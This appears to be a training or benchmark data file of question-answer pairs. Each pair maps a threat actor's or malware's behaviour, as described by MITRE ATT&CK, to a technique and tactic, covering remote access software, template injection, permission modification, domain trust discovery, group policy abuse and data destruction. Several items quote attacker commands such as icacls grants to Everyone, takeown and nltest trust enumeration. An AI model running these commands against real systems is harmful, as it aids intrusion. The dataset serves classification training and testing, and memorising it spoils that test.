+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses legitimate utilities such as AnyDesk and PuTTy for maintaining remote access to victim environments.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya used DameWare Mini Remote Control for lateral movement.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM has used the malware variant, TerraTV, to run a legitimate TeamViewer application to connect to compromrised machines.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has utilized the remote management tool Atera to download malware to a compromised system.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool ""ConnectWise Control"" to deploy REvil.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used a modified TeamViewer client as a command and control channel.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used legitimate applications ScreenConnect and AteraAgent to manage systems remotely and move laterally.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has installed TeamViewer on targeted systems.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has used a modified version of TeamViewer and Remote Utilities for remote access.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used remote administration tools or remote industrial control system client software for execution and to maliciously release electricity breakers.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider directed victims to run remote monitoring and management (RMM) tools.
+
+In addition to directing victims to run remote software, Scattered Spider members themselves also deploy RMM software including AnyDesk, LogMeIn, and ConnectWise Control to establish persistence on the compromised network.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has established tmate sessions for C2 communications.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Thrip used a cloud-based remote access software called LogMeIn for their attacks.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has a plugin for VNC and Ammyy Admin Tool.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex contains a module for VNC.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has established tmate sessions for C2 communications.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has the capability to download a VNC module from command and control (C2).,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses vncDll module to remote control the victim machine.,"Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.","Tecnique: T1220 XSL Script Processing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.,"Tecnique: T1220 XSL Script Processing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa used an XSL file to run VBScript code.,"Tecnique: T1220 XSL Script Processing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.,"Tecnique: T1220 XSL Script Processing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.","Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.","Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used a weaponized Microsoft Word document with an embedded RTF exploit.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.","Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used decoy documents to load malicious remote payloads via HTTP.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.","Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.,"Tecnique: T1221 Template Injection, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.","Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can use icacls /reset and takeown /F to reset a targeted executable's permissions and then take ownership.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can use Windows commands such as `fsutil behavior set SymLinkEvaluation R2L:1` to redirect file system access to a different location after gaining access into compromised networks.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper can modify ACL entries to take ownership of files.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can modify the binary ACL to prevent security tools from running.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can use the command-line utility cacls.exe to change file permissions.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete every access-based restrictions on files and directories.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry uses attrib +h and icacls . /grant Everyone:F /T /C /Q to make some of its files hidden and grant all users full access controls.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker has a command to take ownership of a file and reset the ACL permissions using the takeown.exe /F filepath command.,"Tecnique: T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's macOS backdoor changes the permission of the file it wants to execute to 755.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has changed file permissions of files so they could not be modified.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has modified the permissions on binaries with chattr.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Black Basta binary can use `chmod` to gain full permissions to targeted files.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore changes the permissions of a payload using the command chmod -R 755.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER will set the GID of `httpsd` to 90 when infected.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok gives all users execute permissions for the application using the command chmod +x /Users/Shared/AppStore.app.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used chmod to modify permissions on key files for use.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.","Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via chmod.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell has the ability to modify file permissions.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can add the executable flag to a downloaded file.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses the chmod +x command to grant executable permissions to the malicious file.,"Tecnique: T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can terminate itself if specific execution flags are not present.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer compares file names and paths to a list of excluded names and directory names during encryption.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can check its current working directory and for the presence of a specific file and terminate if specific values are not found.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain.","Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses per-victim links for hosting malicious archives, such as ZIP files, in services such as SharePoint to prevent other entities from retrieving them.","Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout can call window.location.pathname to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.","Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NativeZone can check for the presence of KM.EkeyAlmaz1C.dll and will halt execution unless it is in the same directory as the rest of the malware's components.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.","Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found.,"Tecnique: T1480 Execution Guardrails, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.","Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Equation has been observed utilizing environmental keying in payload delivery.,"Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.","Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can store its final payload in the Registry under `$HKLM\SOFTWARE\Classes\Interface\` encrypted with a dynamically generated key based on the drive’s serial number.,"Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerPunch can use the volume serial number from a target host to generate a unique XOR key for the next stage payload.,"Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT relies on a specific victim hostname to execute and decrypt important strings.,"Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.,"Tecnique: T1480.001 Execution Guardrails: Environmental Keying, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.","Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used the `Get-AcceptedDomain` PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.","Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses the built-in Nltest utility or tools such as AdFind to enumerate Active Directory trusts in victim environments.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has nltest /domain_trusts to identify domain trust relationships.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used Nltest to obtain information about domain controllers.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has retrieved a list of trusted domains by using nltest.exe /domain_trusts.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used a web shell to execute `nltest /trusted_domains` to identify trust relationships.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AdFind can gather information about organizational units (OUs) and domain trusts from Active Directory.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use `nltest.exe /domain_trusts` to discover domain trust relationships on a compromised machine.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can use Nltest tools to obtain information about the domain.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound has the ability to map domain trusts and identify misconfigurations for potential abuse.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use LDAP queries and `nltest /domain_trusts` for domain trust discovery.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has modules for enumerating domain trusts.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nltest may be used to enumerate trusted domains by using commands such as nltest /domain_trusts.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 has modules for enumerating domain trusts.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit has modules such as Get-NetDomainTrust and Get-NetForestTrust to enumerate domain and forest trusts.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can run nltest /domain_trusts /all_trusts for domain trust discovery.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rubeus can gather information about domain trusts.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can profile compromised systems to identify domain trust relationships.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can gather information about domain trusts by utilizing Nltest.,"Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: dsquery can be used to gather information on domain trusts with dsquery * -filter ""(objectClass=trustedDomain)"" -attr *.","Tecnique: T1482 Domain Trust Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Group Policy Objects (GPOs) to deploy and execute malware.","Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used Group Policy to deploy batch scripts for ransomware deployment.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used Group Policy Objects to deploy batch scripts.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can modify the GPO to evade detection.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use New-GPOImmediateTask to modify a GPO that will install and execute a malicious Scheduled Task/Job.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to deploy through an infected system's default domain policy.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can use group policy to push a scheduled task from the AD to all network machines.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige has been deployed using the Default Domain Group Policy Object from an Active Directory Domain Controller.,"Tecnique: T1484.001 Domain or Tenant Policy Modification: Group Policy Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 changed domain federation trust settings using Azure AD administrative permissions to configure the domain to accept authorization tokens signed by their own SAML signing certificate.","Tecnique: T1484.002 Domain or Tenant Policy Modification: Trust Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider adds a federated identity provider to the victim’s SSO tenant and activates automatic account linking.,"Tecnique: T1484.002 Domain or Tenant Policy Modification: Trust Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.,"Tecnique: T1484.002 Domain or Tenant Policy Modification: Trust Modification, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed CaddyWiper on the victim’s IT environment systems to wipe files related to the OT capabilities, along with mapped drives, and physical drive partitions.","Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used a custom secure delete function to make deleted files unrecoverable.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used tools to delete files and folders from victims' desktops and profiles.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has deleted the target's systems and resources both on-premises and in the cloud.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used the BlackEnergy KillDisk component to overwrite files on Windows-based Human-Machine Interfaces.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AcidRain performs an in-depth wipe of the target filesystem and various attached storage devices through either a data overwrite or calling various IOCTLS to erase it.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy 2 contains a ""Destroy"" plug-in that destroys data stored on victim hard drives by overwriting file contents.","Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can delete specified files from a targeted system.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. HermeticWiper can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes.","Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar can overwrite files with random data before deleting them.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk deletes system files to make the OS unbootable. KillDisk also targets and deletes files with 35 different file extensions.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer overwrites files locally and on remote shares.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has a command to write random data across a file and delete it.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc can overwrite files indicated by the attacker before deleting them.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has the capability to destroy files and folders.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDelete deletes data in a way that makes it unrecoverable.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
